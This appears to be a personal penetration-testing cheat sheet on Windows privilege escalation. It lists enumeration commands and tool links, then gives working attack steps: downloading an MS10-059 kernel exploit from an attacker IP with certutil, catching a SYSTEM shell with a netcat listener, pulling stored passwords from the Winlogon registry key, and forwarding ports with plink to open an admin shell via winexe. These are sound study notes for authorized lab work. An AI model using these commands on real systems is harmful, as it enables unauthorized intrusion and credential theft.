# Windows Privilege Escalation ###### tags: `windows` `priv esc` [Fuzzy Security reference](https://fuzzysecurity.com/tutorials/16.html) [Windows Priv Esc Guide -abs](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) [Priv Esc Windows Guide -sushant](https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html) [Payload all the things](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/) ``` # to get system info use: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # to check patching levels use: wmic qfe wmic qfe get Caption,Description,HotFixID,InstalledOn # to list drives use: wmic logicaldisk get caption,description,providername # show current user whoami # show current privileges whoami /priv # show groups for current user whoami /groups # show users on the machine net user # show info for user x net user x # show info for group x net localgroup x # show arp table arp -a # show routing table route print # network statistics netstat -ano # see defender status (sc is service control) sc query windefend # see all services running sc queryex type= service # see state of fw through either of these two commands netsh firewall show state netsh advfirewall firewall dump # see config netsh firewall show config ``` ## Automated Tools Overview WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation Sherlock - https://github.com/rasta-mouse/Sherlock Watson - https://github.com/rasta-mouse/Watson PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc JAWS - https://github.com/411Hall/JAWS Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/ Seatbelt - https://github.com/GhostPack/Seatbelt SharpUp - https://github.com/GhostPack/SharpUp To install pip incase you don't have it `curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py` Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits ## Manual Exploitation We can compile the exploit then set up a web server with python for the victim machine to reach out to and download the file. ```=1 # set up the server python -m SimpleHTTPServer 80 #or python3 -m HTTP.server # navigate to the webserver and download the file certutil -urlcache -f http://ip/filename localName e.g certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe ``` We then set up a listener for the victim to connect back to: ```=1 # setup a listener on the attacker machine nc -nlvp 5555 # run the exploit on the victim ms.exe ip port e.g ms.exe 10.10.14.4 5555 # pops a shell as NT AUTHORITY\SYSTEM ``` MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 ### Password abuse ```=1 # once we have a shell we can run the command below to look for default passwords stored in registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # for machines where a port is only available internally, we can forward that port if we have a low level shell # we can forward the traffic using plink.exe which can be downloaded from the putty download page # before using plink, lets edit the ssh_config to allow root login by changing the PermitRootLogin to true under /etc/ssh/sshd_config # the command syntax is # plink.exe -l SuperUser -pw Passwd -R internalPort:localhost:ExternalPort External ip plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4 # we can pop an admin shell with the command below over the previously forwaded port winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe" ``` Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html ### Stabilizing a shell [TTy shell escape](https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell)